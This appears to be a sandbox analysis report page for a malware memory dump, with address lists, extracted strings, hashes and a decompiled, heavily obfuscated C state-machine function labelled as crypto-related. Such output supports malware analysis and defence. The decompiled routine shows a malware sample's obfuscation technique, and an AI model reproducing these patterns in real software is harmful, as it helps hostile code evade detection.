0x02b3391a
0x02b33922
0x02b3392f
0x02b3393e
0x02b33941
0x02b33945
0x02b3394d
0x02b33955
0x02b3395d
0x02b33965
0x02b33975
0x02b33979
0x02b3397e
0x02b33986
0x02b33991
0x02b3399c
0x02b339a7
0x02b339b2
0x02b339bd
0x02b339c8
0x02b339d3
0x02b339de
0x02b339e9
0x02b339f0
0x02b339fb
0x02b33a03
0x02b33a0b
0x02b33a13
0x02b33a1b
0x02b33a23
0x02b33a30
0x02b33a33
0x02b33a3c
0x02b33a40
0x02b33a48
0x02b33a50
0x02b33a5b
0x02b33a63
0x02b33a6e
0x02b33a7e
0x02b33a82
0x02b33a87
0x02b33a8f
0x02b33a97
0x02b33aa2
0x02b33aad
0x02b33ab8
0x02b33ac3
0x02b33acb
0x02b33ad6
0x02b33ae1
0x02b33ae9
0x02b33af9
0x02b33afd
0x02b33b02
0x02b33b0a
0x02b33b1c
0x02b33b1f
0x02b33b26
0x02b33b31
0x02b33b3c
0x02b33b44
0x02b33b51
0x02b33b5d
0x02b33b62
0x02b33b68
0x02b33b70
0x02b33b83
0x02b33b86
0x02b33b8d
0x02b33b95
0x02b33ba0
0x02b33bab
0x02b33bb6
0x02b33bc1
0x02b33bcc
0x02b33bd7
0x02b33be2
0x02b33bed
0x02b33c03
0x02b33c0a
0x02b33c15
0x02b33c20
0x02b33c2b
0x02b33c36
0x02b33c49
0x02b33c4a
0x02b33c51
0x02b33c59
0x02b33c64
0x02b33c77
0x02b33c7e
0x02b33c89
0x02b33c94
0x02b33c9f
0x02b33caa
0x02b33cb2
0x02b33cba
0x02b33cbf
0x02b33cc7
0x02b33ccf
0x02b33cd7
0x02b33cdb
0x02b33ce0
0x02b33ce5
0x02b33ced
0x02b33cf8
0x02b33d03
0x02b33d0e
0x02b33d1c
0x02b33d25
0x02b33d29
0x02b33d31
0x02b33d3c
0x02b33d47
0x02b33d52
0x02b33d5d
0x02b33d68
0x02b33d73
0x02b33d7e
0x02b33d89
0x02b33d91
0x02b33d9c
0x02b33da7
0x02b33daf
0x02b33dba
0x02b33dc2
0x02b33dca
0x02b33dd2
0x02b33ddc
0x02b33de4
0x02b33df9
0x02b33dfc
0x02b33e03
0x02b33e0e
0x02b33e19
0x02b33e2f
0x02b33e36
0x02b33e41
0x02b33e4c
0x02b33e54
0x02b33e5f
0x02b33e6a
0x02b33e7d
0x02b33e80
0x02b33e87
0x02b33e92
0x02b33e9d
0x02b33eb0
0x02b33eb7
0x02b33ec2
0x02b33ecd
0x02b33ee3
0x02b33eea
0x02b33ef5
0x02b33f00
0x02b33f08
0x02b33f13
0x02b33f1e
0x02b33f30
0x02b33f33
0x02b33f3a
0x02b33f42
0x02b33f4d
0x02b33f58
0x02b33f60
0x02b33f6b
0x02b33f7e
0x02b33f85
0x02b33f90
0x02b33f98
0x02b33fa0
0x02b33fa8
0x02b33fb0
0x02b33fb8
0x02b33fc0
0x02b33fcd
0x02b33fd1
0x02b33fd9
0x02b33fe1
0x02b33fec
0x02b33ff7
0x02b34002
0x02b3400d
0x02b34018
0x02b34023
0x02b3402e
0x02b34036
0x02b3403e
0x02b34049
0x02b34054
0x02b3405f
0x02b3406a
0x02b34077
0x02b34082
0x02b3408e
0x02b34095
0x02b3409a
0x02b340a3
0x02b340ae
0x02b340b9
0x02b340cc
0x02b340cf
0x02b340d6
0x02b340e1
0x02b340f4
0x02b340fb
0x02b34106
0x02b34111
0x02b34119
0x02b34126
0x02b3412a
0x02b3412f
0x02b34137
0x02b34142
0x02b3414a
0x02b34155
0x02b34165
0x02b34169
0x02b3416e
0x02b34176
0x02b3417e
0x02b34189
0x02b34194
0x02b3419f
0x02b341aa
0x02b341b2
0x02b341b7
0x02b341c4
0x02b341c5
0x02b341c9
0x02b341d1
0x02b341dc
0x02b341e7
0x02b341f2
0x02b341ff
0x02b34209
0x02b3420d
0x02b34212
0x02b3421a
0x02b34222
0x02b3422a
0x02b34232
0x02b3423a
0x02b34242
0x02b3424a
0x02b34252
0x02b3425a
0x02b3425f
0x02b34267
0x02b34267
0x02b34267
0x02b3426c
0x02b34271
0x02b34271
0x02b34276
0x02b34276
0x02b34276
0x02b34276
0x02b34278
0x00000000
0x00000000
0x02b34628
0x02b3462e
0x02b34707
0x02b34714
0x02b3471b
0x02b3471d
0x02b3471d
0x02b34722
0x02b34727
0x00000000
0x02b34727
0x02b34634
0x02b34636
0x02b3464e
0x02b3465a
0x02b34661
0x02b3466c
0x02b34690
0x02b346c7
0x02b346de
0x02b346ef
0x02b346f4
0x02b343ef
0x02b343ef
0x00000000
0x02b343ef
0x02b34638
0x02b3463e
0x00000000
0x00000000
0x02b34644
0x02b34644
0x02b3427e
0x02b344d1
0x02b344dd
0x02b344e1
0x02b344ec
0x02b344f1
0x02b344fa
0x02b344fc
0x02b34500
0x02b3450e
0x02b34526
0x02b3452d
0x02b34534
0x02b34543
0x02b34551
0x02b3455c
0x02b3456a
0x02b34571
0x02b34579
0x02b345d3
0x02b345e3
0x02b345fb
0x02b3461b
0x02b34620
0x02b344c7
0x02b344c7
0x00000000
0x02b344c7
0x02b3428a
0x02b343f9
0x02b34405
0x02b3440c
0x02b34414
0x02b34419
0x02b34427
0x02b3442e
0x02b3447a
0x02b3448e
0x02b3449f
0x02b344bf
0x02b344c4
0x00000000
0x02b344c4
0x02b34292
0x02b34311
0x02b3431d
0x02b34321
0x02b34334
0x02b3433a
0x02b34349
0x02b3435e
0x02b3437e
0x02b343a9
0x02b343b2
0x02b343b7
0x02b343ba
0x02b343c1
0x02b343ca
0x02b343c3
0x02b343c5
0x02b343c7
0x02b343c7
0x02b343e7
0x02b343ec
0x00000000
0x02b343ec
0x02b34296
0x02b342e9
0x02b342ee
0x02b342ef
0x02b342f8
0x02b342fa
0x02b342fd
0x02b34302
0x02b34306
0x02b34309
0x00000000
0x02b34309
0x02b3429a
0x00000000
0x00000000
0x02b342b9
0x02b342c2
0x02b342cc
0x02b3472c
0x02b3472c
0x02b3472c
0x00000000
0x02b34738

Strings

L, xrefs: 02B33D68
zj, xrefs: 02B33F4D
R, xrefs: 02B33C0A
_EBM, xrefs: 02B33473
T9, xrefs: 02B33965
)<L, xrefs: 02B33591
!Sw, xrefs: 02B336F7
J', xrefs: 02B33627
sv, xrefs: 02B33A23
Vdd, xrefs: 02B3421A
c, xrefs: 02B3377B
{, xrefs: 02B33570
Et, xrefs: 02B33CE5

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
API String ID: 0-2179300830
Opcode ID: 01fa8ed8a14d3d67923b8c06951ae28b9f7d322ac216476e3b15967370e1ad6d
Instruction ID: 998c2da7564205e692e1e0ef2d277f90c84bb52ebd2aa1e6a03b7b32fa31a1d5
Opcode Fuzzy Hash: 01fa8ed8a14d3d67923b8c06951ae28b9f7d322ac216476e3b15967370e1ad6d
Instruction Fuzzy Hash: 2392DE715093819FD3B9CF25C58AB9FBBE2BBC4304F10891DE1DA96260DBB19949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02B467E6, Relevance: 17.0, Strings: 13, Instructions: 728
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E02B467E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _t846;
				intOrPtr _t847;
				signed int _t861;
				void* _t866;
				signed int _t867;
				signed int _t874;
				signed int* _t876;
				signed int _t885;
				void* _t937;
				signed int _t946;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t978;
				signed int _t980;
				signed int _t985;
				signed int _t986;
				signed int* _t989;
				void* _t991;

				_t876 = _a28;
				_push(_a48);
				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t876);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_a20 & 0x0000ffff);
				_v304 = 0x84e682;
				_t989 =  &(( &_v304)[0xe]);
				_v304 = _v304 + 0xeb1b;
				_v304 = _v304 ^ 0x0f7f391c;
				_v304 = _v304 ^ 0x0ffae881;
				_t874 = 0;
				_v80 = 0xd03450;
				_t978 = 0x7e00160;
				_v80 = _v80 + 0x474c;
				_v80 = _v80 ^ 0x00d07b8f;
				_v40 = 0x62fb41;
				_v40 = _v40 ^ 0x58566629;
				_v40 = _v40 ^ 0x58349da0;
				_v56 = 0xe1b746;
				_v56 = _v56 + 0x8be3;
				_v56 = _v56 ^ 0x00e2c329;
				_v32 = 0xe6e4c5;
				_v32 = _v32 + 0xfb3f;
				_v32 = _v32 ^ 0x00e7a004;
				_v164 = 0x3535e2;
				_v164 = _v164 + 0xb15e;
				_v164 = _v164 + 0xffff4c2e;
				_v164 = _v164 ^ 0x0075336e;
				_v256 = 0xe056c0;
				_v256 = _v256 >> 0xf;
				_v12 = 0;
				_t960 = 0xf;
				_v256 = _v256 / _t960;
				_t961 = 0x75;
				_v256 = _v256 / _t961;
				_v256 = _v256 ^ 0x00040000;
				_v64 = 0xc12004;
				_v64 = _v64 | 0x05a7924d;
				_v64 = _v64 ^ 0x01e7b24d;
				_v200 = 0x3d9b4;
				_v200 = _v200 + 0xffffba05;
				_t962 = 0x4d;
				_push("true");
				_v200 = _v200 / _t962;
				_v200 = _v200 >> 0xa;
				_v200 = _v200 ^ 0x00080002;
				_v264 = 0xdbb33c;
				_pop(_t963);
				_v264 = _v264 / _t963;
				_v264 = _v264 ^ 0x3bde5a68;
				_t964 = 0x74;
				_v264 = _v264 * 0x67;
				_v264 = _v264 ^ 0x14497559;
				_v172 = 0x2a3d0;
				_v172 = _v172 + 0xffff520a;
				_v172 = _v172 + 0xffffc196;
				_v172 = _v172 ^ 0x0001b670;
				_v16 = 0x40a0dc;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x8000040a;
				_v280 = 0x3a90ef;
				_v280 = _v280 + 0xfffff29b;
				_v280 = _v280 + 0xd15d;
				_v280 = _v280 + 0xffff2fb1;
				_v280 = _v280 ^ 0x003a8498;
				_v276 = 0x2b48bd;
				_v276 = _v276 * 0x59;
				_v276 = _v276 | 0x0b3e9c0e;
				_v276 = _v276 + 0x2f0e;
				_v276 = _v276 ^ 0x0f3f0c8c;
				_v244 = 0xf133cf;
				_v244 = _v244 * 0x50;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 >> 2;
				_v244 = _v244 ^ 0x00004b7f;
				_v220 = 0x48bde3;
				_v220 = _v220 * 7;
				_v220 = _v220 << 3;
				_v220 = _v220 << 7;
				_v220 = _v220 ^ 0xf4c4d41f;
				_v152 = 0xdfcbbb;
				_v152 = _v152 / _t964;
				_v152 = _v152 ^ 0x15954f38;
				_v152 = _v152 ^ 0x1594a2df;
				_v236 = 0x79b2d;
				_v236 = _v236 + 0xffffa56f;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 + 0xffff51ce;
				_v236 = _v236 ^ 0xffff5342;
				_v300 = 0x53b7c5;
				_v300 = _v300 | 0xbc55bbc8;
				_v300 = _v300 >> 0xb;
				_v300 = _v300 * 0x4a;
				_v300 = _v300 ^ 0x06ca0610;
				_v300 = 0x831a37;
				_v300 = _v300 >> 0xa;
				_v300 = _v300 ^ 0xf07c3cef;
				_v300 = _v300 >> 2;
				_v300 = _v300 ^ 0x3c15b978;
				_v296 = 0xbc94b;
				_v296 = _v296 ^ 0xc913797f;
				_v296 = _v296 ^ 0xc91ffb85;
				_v304 = 0xeb47f;
				_v304 = _v304 * 0x21;
				_v304 = _v304 >> 9;
				_v304 = _v304 ^ 0x00079d5b;
				_v296 = 0x863d92;
				_v296 = _v296 | 0xc3fe325e;
				_v296 = _v296 ^ 0xc3f15d89;
				_v304 = 0x8c9292;
				_v304 = _v304 * 0x65;
				_v304 = _v304 * 0x2f;
				_v304 = _v304 ^ 0x2ea0d0e4;
				_v296 = 0x7998c8;
				_v296 = _v296 * 0x1f;
				_v296 = _v296 ^ 0x0ebe6fc9;
				_v304 = 0xc13eda;
				_v304 = _v304 + 0x239b;
				_v304 = _v304 | 0x8aa80eb1;
				_v304 = _v304 ^ 0x8ae5aa52;
				_v304 = 0x2ac635;
				_t965 = 3;
				_v304 = _v304 * 0x1a;
				_v304 = _v304 | 0xa2ccc89a;
				_v304 = _v304 ^ 0xa6da26ac;
				_v296 = 0xd161a;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 ^ 0x00086437;
				_v300 = 0xc8d906;
				_v300 = _v300 << 5;
				_v300 = _v300 / _t965;
				_v300 = _v300 | 0xd3e5db7e;
				_v300 = _v300 ^ 0xdbffc0c3;
				_v304 = 0xa90eaa;
				_t966 = 0x62;
				_v304 = _v304 / _t966;
				_v304 = _v304 ^ 0xa321830c;
				_v304 = _v304 ^ 0xa32eb72c;
				_v296 = 0xc9c90e;
				_v296 = _v296 ^ 0x29ac5136;
				_v296 = _v296 ^ 0x296c2187;
				_v168 = 0xb8ba74;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 | 0xd39b7801;
				_v168 = _v168 ^ 0xd39a1a13;
				_v240 = 0xce03d4;
				_v240 = _v240 + 0xffff6ba1;
				_v240 = _v240 + 0xffff3730;
				_t967 = 0x7e;
				_v240 = _v240 / _t967;
				_v240 = _v240 ^ 0x00015c8a;
				_v144 = 0x76dd98;
				_v144 = _v144 << 0xa;
				_t968 = 0xb;
				_v144 = _v144 / _t968;
				_v144 = _v144 ^ 0x13f9c089;
				_v88 = 0xd6758c;
				_t969 = 0x7c;
				_v88 = _v88 * 0x7d;
				_v88 = _v88 ^ 0x68b07bf0;
				_v112 = 0x136ce2;
				_v112 = _v112 * 0x7a;
				_v112 = _v112 ^ 0x094e8b6c;
				_v160 = 0xc781f4;
				_v160 = _v160 + 0x7b6;
				_v160 = _v160 ^ 0xd2a6870e;
				_v160 = _v160 ^ 0xd267b3cc;
				_v216 = 0x3cec52;
				_v216 = _v216 / _t969;
				_v216 = _v216 + 0xe7c2;
				_v216 = _v216 + 0x185f;
				_v216 = _v216 ^ 0x00083478;
				_v128 = 0xe8ace2;
				_v128 = _v128 + 0xffff5a4b;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00080537;
				_v20 = 0xba5f1f;
				_t970 = 0x28;
				_v20 = _v20 / _t970;
				_v20 = _v20 ^ 0x00097bc9;
				_v184 = 0x868bed;
				_v184 = _v184 ^ 0x5d9bbcc4;
				_t971 = 0x15;
				_t985 = 0x61;
				_v184 = _v184 * 0x7e;
				_v184 = _v184 ^ 0xd4635941;
				_v248 = 0xc6bb26;
				_v248 = _v248 + 0x4226;
				_v248 = _v248 + 0x1eaa;
				_v248 = _v248 + 0x143f;
				_v248 = _v248 ^ 0x00cd4d4f;
				_v124 = 0x1449aa;
				_v124 = _v124 >> 7;
				_v124 = _v124 + 0xffff4698;
				_v124 = _v124 ^ 0xfffccf45;
				_v204 = 0xd9ae2a;
				_v204 = _v204 * 0x25;
				_v204 = _v204 | 0x41acc33e;
				_v204 = _v204 + 0xe9b9;
				_v204 = _v204 ^ 0x5ff1a5de;
				_v104 = 0x27630a;
				_v104 = _v104 | 0x34992b3f;
				_v104 = _v104 ^ 0x34bda39f;
				_v28 = 0xa04064;
				_v28 = _v28 | 0x72e9e7d8;
				_v28 = _v28 ^ 0x72e1f0ab;
				_v48 = 0xc4ba01;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x6259539c;
				_v180 = 0x3340f4;
				_v180 = _v180 | 0x3035b2e2;
				_v180 = _v180 << 9;
				_v180 = _v180 ^ 0x6feb3ded;
				_v232 = 0x2e047a;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 * 0x12;
				_v232 = _v232 / _t971;
				_v232 = _v232 ^ 0x0002c217;
				_v72 = 0x299f12;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x0148e07c;
				_v188 = 0xf414db;
				_v188 = _v188 << 0x10;
				_v188 = _v188 / _t985;
				_v188 = _v188 ^ 0x003bf194;
				_v156 = 0xc18fa7;
				_t986 = 0x6b;
				_v156 = _v156 / _t986;
				_t972 = 0xc;
				_v156 = _v156 / _t972;
				_v156 = _v156 ^ 0x0009860f;
				_v208 = 0xbb24e8;
				_v208 = _v208 + 0xd4bb;
				_v208 = _v208 + 0xffffec33;
				_t973 = 0x26;
				_v208 = _v208 / _t973;
				_v208 = _v208 ^ 0x000d494f;
				_v92 = 0xf4dbce;
				_v92 = _v92 + 0x5ee7;
				_v92 = _v92 ^ 0x00f22c8f;
				_v100 = 0x7239d1;
				_v100 = _v100 | 0x01f5add3;
				_v100 = _v100 ^ 0x01f71b27;
				_v292 = 0x4b72c4;
				_t974 = 0x61;
				_v292 = _v292 * 0xb;
				_v292 = _v292 + 0xfffff18f;
				_v292 = _v292 * 0xc;
				_v292 = _v292 ^ 0x26e66304;
				_v224 = 0xeae701;
				_v224 = _v224 << 1;
				_v224 = _v224 << 6;
				_v224 = _v224 | 0xd938d457;
				_v224 = _v224 ^ 0xfd70504c;
				_v108 = 0xa91a4c;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x02a24d10;
				_v68 = 0x46e95;
				_v68 = _v68 ^ 0x636abfcf;
				_v68 = _v68 ^ 0x636edf46;
				_v76 = 0x93e843;
				_v76 = _v76 | 0xba39a6db;
				_v76 = _v76 ^ 0xbaba9d8f;
				_v84 = 0xd50ea2;
				_v84 = _v84 | 0x50ec9d25;
				_v84 = _v84 ^ 0x50f8ba70;
				_v288 = 0x52484f;
				_v288 = _v288 + 0xb430;
				_v288 = _v288 * 0x4c;
				_v288 = _v288 >> 0xb;
				_v288 = _v288 ^ 0x000d4af8;
				_v284 = 0x2da3fa;
				_v284 = _v284 | 0xb3c63afe;
				_v284 = _v284 ^ 0xfce0d7d7;
				_v284 = _v284 + 0xffff4c41;
				_v284 = _v284 ^ 0x4f0e5b87;
				_v52 = 0xe252ad;
				_v52 = _v52 | 0x3c4f00b6;
				_v52 = _v52 ^ 0x3cecbbb2;
				_v60 = 0xab577e;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x55a8aa1a;
				_v148 = 0x5c065f;
				_v148 = _v148 << 0x10;
				_v148 = _v148 / _t986;
				_v148 = _v148 ^ 0x00079968;
				_v252 = 0xfb0d10;
				_v252 = _v252 / _t974;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x25f2b671;
				_v252 = _v252 ^ 0xb36c8d69;
				_v260 = 0x776100;
				_v260 = _v260 >> 0x10;
				_v260 = _v260 | 0xe8d0a90c;
				_v260 = _v260 * 0x14;
				_v260 = _v260 ^ 0x304a111f;
				_v268 = 0x4079f3;
				_v268 = _v268 >> 4;
				_t975 = 0x4f;
				_v268 = _v268 * 0x5f;
				_v268 = _v268 + 0x21c5;
				_v268 = _v268 ^ 0x017b7447;
				_v44 = 0x101fed;
				_v44 = _v44 ^ 0x1e85c214;
				_v44 = _v44 ^ 0x1e9d5cc7;
				_v140 = 0xb56248;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0xb0648700;
				_v140 = _v140 ^ 0xb06b52ff;
				_v228 = 0x5d2032;
				_v228 = _v228 + 0xe696;
				_v228 = _v228 + 0x90e;
				_v228 = _v228 << 6;
				_v228 = _v228 ^ 0x178d1a7f;
				_v192 = 0x46faa8;
				_v192 = _v192 / _t975;
				_v192 = _v192 + 0x59ff;
				_v192 = _v192 ^ 0x00002efb;
				_v272 = 0x13fbcb;
				_v272 = _v272 + 0xffff66dd;
				_v272 = _v272 * 0x5d;
				_v272 = _v272 + 0xffff70cc;
				_v272 = _v272 ^ 0x070467b9;
				_v136 = 0xda75c;
				_v136 = _v136 << 0xe;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0xd703a46a;
				_v24 = 0x98e6;
				_v24 = _v24 | 0x30837cf6;
				_v24 = _v24 ^ 0x308cf6e6;
				_v196 = 0x2348e5;
				_v196 = _v196 + 0xec0b;
				_v196 = _v196 + 0xffff4f76;
				_v196 = _v196 + 0xffff4b3e;
				_v196 = _v196 ^ 0x002962b3;
				_v176 = 0x7bcaf7;
				_v176 = _v176 * 0x37;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xa986161e;
				_v120 = 0x3fa34;
				_v120 = _v120 * 0x49;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x00066829;
				_v116 = 0x9c5c94;
				_v116 = _v116 + 0x20fd;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x0025da20;
				_v212 = 0x6b8402;
				_v212 = _v212 + 0x9bc6;
				_v212 = _v212 * 0x74;
				_v212 = _v212 + 0xe621;
				_v212 = _v212 ^ 0x30fe6560;
				_v96 = 0xbe9741;
				_v96 = _v96 + 0xffffd77c;
				_v96 = _v96 ^ 0x00bbad9c;
				_v304 = 0xe465cf;
				_v304 = _v304 >> 4;
				_v304 = _v304 << 5;
				_v304 = _v304 ^ 0x01c3ad6d;
				_v296 = 0xc47264;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x4720cdbf;
				_v132 = 0x7ca780;
				_v132 = _v132 + 0xa093;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x3ea11d20;
				_t976 = _v8;
				_t987 = _v8;
				while(1) {
					L1:
					_t937 = 0xd154a5a;
					while(1) {
						_t846 = _v300;
						while(1) {
							L3:
							_t991 = _t978 - 0x7e00160;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								_t978 = 0xfd2ad77;
								continue;
							} else {
								if(_t978 == 0x1a1d1c) {
									__eflags = E02B34BFC(_t976, _a16);
									_t978 = 0x6a5d586;
									_t866 = 1;
									_t874 =  !=  ? _t866 : _t874;
									goto L13;
								} else {
									if(_t978 == 0x352276a) {
										_t867 = E02B3DDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
										_t987 = _t867;
										__eflags = _t867;
										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
										E02B52B09(_v160, 0, _v216, _v128);
										_t989 =  &(_t989[0xa]);
										L39:
										_t876 = _a28;
										_t937 = 0xd154a5a;
										goto L40;
									} else {
										if(_t978 == 0x6a5d586) {
											E02B4E358(_v196, _v176, _t976, _v120);
											_t978 = 0x6d75a8e;
											goto L12;
										} else {
											if(_t978 == 0x6d75a8e) {
												E02B4E358(_v116, _v212, _t846, _v96);
												_t978 = 0xedc04fb;
												L12:
												L13:
												_t876 = _a28;
												goto L1;
											} else {
												if(_t978 != 0x6fee97d) {
													L40:
													__eflags = _t978 - 0xb1727d5;
													if(_t978 != 0xb1727d5) {
														_t846 = _v300;
														continue;
													}
												} else {
													_t846 = E02B3ED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
													_t876 = _a28;
													_t989 =  &(_t989[0xe]);
													_v300 = _t846;
													_t937 = 0xd154a5a;
													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
													continue;
												}
											}
										}
									}
								}
							}
							L43:
							return _t874;
						}
						__eflags = _t978 - _t937;
						if(_t978 == _t937) {
							__eflags =  *_t876;
							if(__eflags == 0) {
								_t847 = _v12;
							} else {
								_push(_v188);
								_push(_v72);
								_push(_v232);
								_t847 = E02B4E1F8(0x2b31a0c, _v180, __eflags);
								_t989 =  &(_t989[3]);
								_v12 = _t847;
							}
							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
							_t980 = _a32 & 1;
							__eflags = _t980;
							if(_t980 != 0) {
								__eflags = _t946;
							}
							_t976 = E02B34A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
							E02B4FECB(_v12, _v68, _v76, _v84, _v288);
							_t989 =  &(_t989[0x10]);
							__eflags = _t976;
							if(_t976 == 0) {
								_t978 = 0x6d75a8e;
								goto L39;
							} else {
								_v36 = 1;
								E02B53E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
								_t989 =  &(_t989[5]);
								__eflags = _t980;
								if(_t980 != 0) {
									E02B4C8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
									_t769 =  &_v36;
									 *_t769 = _v36 | _v236;
									__eflags =  *_t769;
									E02B53E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
									_t989 =  &(_t989[0xb]);
								}
								_t978 = 0xf81d281;
								goto L13;
							}
						} else {
							__eflags = _t978 - 0xdd5f83a;
							if(__eflags == 0) {
								__eflags = E02B3EF0C(_t976, _v80, __eflags) - _v40;
								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
								goto L13;
							} else {
								__eflags = _t978 - 0xedc04fb;
								if(_t978 == 0xedc04fb) {
									E02B4E358(_v304, _v296, _t987, _v132);
								} else {
									__eflags = _t978 - 0xf81d281;
									if(_t978 == 0xf81d281) {
										_t885 =  *_t876;
										__eflags = _t885;
										if(_t885 == 0) {
											_t861 = 0;
											__eflags = 0;
										} else {
											_t861 = _a28[1];
										}
										_push(_t885);
										E02B510DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
										_t989 =  &(_t989[7]);
										asm("sbb esi, esi");
										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
										goto L13;
									} else {
										__eflags = _t978 - 0xfd2ad77;
										if(_t978 != 0xfd2ad77) {
											goto L40;
										} else {
											_t978 = 0x352276a;
											goto L3;
										}
									}
								}
							}
						}
						goto L43;
					}
				}
			}

0x02b467f8
0x02b46800
0x02b4680a
0x02b46811
0x02b46818
0x02b4681f
0x02b46826
0x02b4682d
0x02b4682e
0x02b46835
0x02b46836
0x02b4683d
0x02b46844
0x02b4684b
0x02b46852
0x02b46853
0x02b46854
0x02b46859
0x02b46861
0x02b46864
0x02b4686e
0x02b46878
0x02b46880
0x02b46882
0x02b4688d
0x02b46892
0x02b4689d
0x02b468a8
0x02b468b3
0x02b468be
0x02b468c9
0x02b468d4
0x02b468df
0x02b468ea
0x02b468f5
0x02b46900
0x02b4690b
0x02b46916
0x02b46921
0x02b4692c
0x02b46937
0x02b4693f
0x02b46944
0x02b46951
0x02b46956
0x02b46960
0x02b46965
0x02b4696b
0x02b46973
0x02b4697e
0x02b46989
0x02b46994
0x02b4699c
0x02b469a8
0x02b469ab
0x02b469ad
0x02b469b1
0x02b469b6
0x02b469c0
0x02b469cc
0x02b469d1
0x02b469d7
0x02b469e4
0x02b469e5
0x02b469e9
0x02b469f1
0x02b469fc
0x02b46a07
0x02b46a12
0x02b46a1d
0x02b46a28
0x02b46a30
0x02b46a3b
0x02b46a43
0x02b46a4b
0x02b46a53
0x02b46a5b
0x02b46a63
0x02b46a70
0x02b46a74
0x02b46a7c
0x02b46a84
0x02b46a8c
0x02b46a99
0x02b46a9d
0x02b46aa2
0x02b46aa7
0x02b46aaf
0x02b46abc
0x02b46ac0
0x02b46ac5
0x02b46aca
0x02b46ad2
0x02b46ae6
0x02b46aed
0x02b46af8
0x02b46b03
0x02b46b0b
0x02b46b13
0x02b46b18
0x02b46b20
0x02b46b28
0x02b46b30
0x02b46b38
0x02b46b42
0x02b46b46
0x02b46b4e
0x02b46b56
0x02b46b5b
0x02b46b63
0x02b46b68
0x02b46b70
0x02b46b78
0x02b46b80
0x02b46b88
0x02b46b95
0x02b46b99
0x02b46b9e
0x02b46ba6
0x02b46bae
0x02b46bb6
0x02b46bbe
0x02b46bcb
0x02b46bd4
0x02b46bd8
0x02b46be0
